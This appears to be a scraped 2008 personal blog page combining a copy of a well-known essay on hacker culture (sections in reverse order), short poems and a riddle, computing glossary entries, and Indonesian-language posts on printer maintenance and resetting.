SiteGround has been supporting and hosting Joomla sites from the very start of Joomla! back in 2005. Through the years we have proven to be the best Joomla host, providing unmet elsewhere features such as free Joomla installation, Joomla-optimized servers, free templates, fast and efficient support. Based on our experience we are offering you this tutorial.

Joomla tutorial includes:

All our resources are being constantly updated and improved to make sure SiteGround continues to offer the best Joomla hosting package with the richest set of features for every Joomla-powered website.

Software For many Type Mobile Phone

Aobncer
PalmOne
Alcatel
Panasonic
AnexTEK
Pantech
Asus
Pharos
Audiovox
Philips
BenQ
Qool
BenQ-Siemens
Qtek
BlackBerry
RoverPC
CECT
Sagem
Cingular
Samsung
Dell
Sanyo
Dopod
Sendo
ETEN
SFR
Fujitsu-Siemens
Sharp
Garmin
Siemens
Gigabyte
Smart
Handspring
Sony
HP
Sony-Ericsson
HTC
Sprint
Huawei
Symbol
i-mate
T-Mobile
I-mobile
Tapwave
Kinpo
Tatung
Lenovo
Torq
LG
Toshiba
LG Electronics
UBiQUiO
Mitac
UTStarcom
Motorola
Verizon
NEC
Viewsonic
Nokia
VK Mobile
O2
Vodafone
Orange
Willcom
Palm

Browse Software by Platform

Selasa, 04 Maret 2008

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

*Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.
*Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
*Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.
*Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.
*Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
*Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.

Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.

Finally, a few things not to do.

*Don't use a silly, grandiose user ID or screen name.
*Don't get in flame wars on Usenet (or anywhere else).
*Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.
*Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it's a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term 'nerd' used to be used this way back in the 1990s, back when 'nerd' was a mild pejorative and 'geek' a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren't techies.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.

If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.

Status in the Hacker Culture

1. Write open-source software
2. Help test and debug open-source software
3. Publish useful information
4. Help keep the infrastructure working
5. Serve the hacker culture itself

Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one's motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.

There are basically five kinds of things you can do to be respected by hackers:

Basic Hacking Skills

1. Learn how to program.
2. Get one of the open-source Unixes and learn to use and run it.
3. Learn how to use the World Wide Web and write HTML.
4. If you don't have functional English, learn it.

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.
2. No problem should ever have to be solved twice.
3. Boredom and drudgery are evil.
4. Freedom is good.
5. Attitude is no substitute for competence.

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:


To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

What Is a Hacker?

The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

lost in the darkness

I'm lost in the darkness
And i can't see the light
I'm lost
I can't find any hope
All i see is the darkness in all
I just want to see the light
Can someone help me see the light?
I'm lost inside
I want to get out of the darkness
can someone help me see the light
I just want to be free to see the light
I cant seem to trust anyone
they always turn their backs on me
they have no hope for me to see the light
im lost inside
i wish someone could help me
im lost in the darkness

Everything You Don’t Know About Me

My mind is lost
My heart is lost
My body is lost
My spirit is lost
And I don’t know
If I can find it.

My pride is somewhat lost
My soul is somewhat lost
My thoughts are somewhat lost
My words are somewhat lost
Can not find what to say.

My life is confused
My daily happiness
Is still confused.
My smiles that I give
Are confused
But I don’t want to pretend
That I am happy when I’m not.

The smiles are numb to me
The laughs are numb to me
The good spirit is numb to me
The goals are lost and forever
Numb to me.

The love is no longer there
The happiness is no longer there
The smiles and pretending is
No longer there.
The happy thoughts are
No longer there.

Nowhere to be found
This is me.
But I don’t get it
They hurt me
Can’t they see?

Maybe I should just stay out
Of their lives.

lost only once

What’s lost only once, and once lost, lost forever?
The answer’s not hard, and you needn’t be clever
to know when it’s stiff you can’t bend from the waist:
It’s the bone that’s removed when your hip joint’s replaced.

About me

Who is Ranto? Ranto is Just simple human was born in Wonogiri.
i have 3 brothers and 1 sister... its enough info to tell......

I don't want much to say about myself - so I will throw a bunch of articles to know about me more.

Senin, 03 Maret 2008

Download

To copy data (usually an entire file) from a main source to a peripheral device. The term is often used to describe the process of copying a file from an online service or bulletin board service (BBS) to one's own computer. Downloading can also refer to copying a file from a network file server to a computer on the network.

In addition, the term is used to describe the process of loading a font into a laser printer. The font is first copied from a disk to the printer's local memory. A font that has been downloaded like this is called a soft font to distinguish it from the hard fonts that are permanently in the printer's memory.

The opposite of download is upload, which means to copy a file from your own computer to another computer.

Tutorial

A computer tutorial is an interactive software program created as a learning tool. Tutorials help people learn new skills by using a step-by-step process that ensures the user is following along and comprehending the material. For example, a Web development tutorial may begin with instructions on how to create a basic Web page. This page might only include the words "Welcome to my website" on it and use the minimum HTML required in order for the page to load in a Web browser. Once the user is able to create a working Web page, the tutorial may explain how to add other features, such as styled text, table layouts, and images, to the page. Then the tutorial may provide instructions on how to publish the Web page to the Internet.

Some software tutorials provide testing features to ensure comprehension of the material, while others may be simple walkthroughs of a software program. Tutorials can be used for both school and business purposes and are written for basic, intermediate, and advanced users. Even smart computer programmers use tutorials. Most software development programs include a tutorial for creating a "Hello World!" program, which is the most basic program that can be created with the software. Since tutorials offer a gradual approach to learning, they can be helpful to people at many different skill levels. If a computer programmer can benefit from a tutorial, just about anybody can.

Mereset Printer Yang Mogok

Pada Printer Canon , Epson , Hp Inkjet semua type, jumlah pencetakannya akan selalu diakumulasikan hingga batas tertentu. Dan bila sudah mencapai batas yang ditetapkan, maka akan Overload dengan ditandai lampu LED menyala secara bergantian atau disebut dengan BLINKING. Jika hal ini terjadi, maka Mau tidak mau printer harus dI service. Hal ini tidak masalah jika rumah kita dekat Lalu bagaimana jika Rumah Kita Di Luar Kota atau bahkan di Luar Pulau. Solusinya kita harus menservice sendiri printer kita, syaratnya harus punya software RESETTER dan trik bagaimana meresetnya.

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. Mereset printer Blingking
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Langkah Awal Mengatasi Masalah Printer
  2. Perawatan Printer dengan Benar
  3. Bekerja dengan Printer di SUSE
  4. Bekerja dengan Printer di JDS
  5. Berbagi Printer di Linux dengan Samba
  6. Tutorial Samba
  7. Local Printer pada Diskless System
  8. Teknologi Jaringan Komputer
  9. Tutorial Komputer dan Jaringan
  10. Cetak Data Report Landscape Pada VB 6.0

Perawatan Printer dengan Benar

Printer merupakan peripheral PC yang penting. Kebanyakan printer PC memakai interface pararel atau centronics. Pada PC, interface tersebut berupa konektor betina jenis D 25 pin, interface pararel tersebut mengirim kedelapan bit data secara serempak, dimana saluran strobe memberitahukan printer bilamana terdapat karakter untuk dibaca. Untuk pembacaan interface pararel menurun, maka printer membaca byte data, kemudian sinyal acknowledge dipakai untuk memberitahukan komputer bahwa interface siap untuk bertaambah lagi. Sinyal lain digunakan untuk memberitahukan PC bila interface sedang aktif atau sibuk, kesalahan telah terjadi atau kertas habis dan lainlain.

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. ranto-printer.zip
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Langkah Awal Mengatasi Masalah Printer
  2. Bekerja dengan Printer di SUSE
  3. Mereset Printer Yang Mogok
  4. Bekerja dengan Printer di JDS
  5. Berbagi Printer di Linux dengan Samba
  6. Tutorial Samba
  7. Local Printer pada Diskless System
  8. Teknologi Jaringan Komputer
  9. Tutorial Komputer dan Jaringan
  10. Cetak Data Report Landscape Pada VB 6

Langkah Awal Mengatasi Masalah Printer

Selama menggunakan printer, pernahkah anda menemui masalah berikut ?

- Printer tidak dapat mencetak
- Printer kelihatan mencetak, namun tidak ada sesuatu yang tertulis diatas kertas
- Halaman cetakan tidak lengkap atau karakter yang dicetak aneh
- Lampu indikator hanya berkedip-kedip terus saat diberikan perintah mencetak
- Kertas tidak dapat masuk ke printer sebagaimana mestinya
- Kertas tidak dapat keluar dari printer
- Hasil cetakan bergaris -garis
- Beberapa fitur yang dijanjikan oleh produsen printer tidak dapat bekerja
- Printer menjadi lambat dalam mencetak
- Font yang tercetak tidak sama dengan yang tampil di layar monitor

DOWNLOAD ARTIKEL LENGKAP (PDF):
  1. ranto-troubleshoot_printer.zip
ARTIKEL LAIN YANG BERHUBUNGAN:
  1. Teknik dan Logika Pemrograman
  2. Mereset Printer Yang Mogok
  3. Local Printer pada Diskless System
  4. Bekerja dengan Printer di JDS
  5. Menambah Koleksi Pilihan Font dalam OpenOffice
  6. Perawatan Printer dengan Benar
  7. Bekerja dengan Printer di SUSE
  8. Langkah-langkah Mensetup WAMP (Windows, Apache, Mysql dan PHP)
  9. Cetak Data Report Landscape Pada VB 6.0
  10. Berbagi Printer di Linux dengan Samba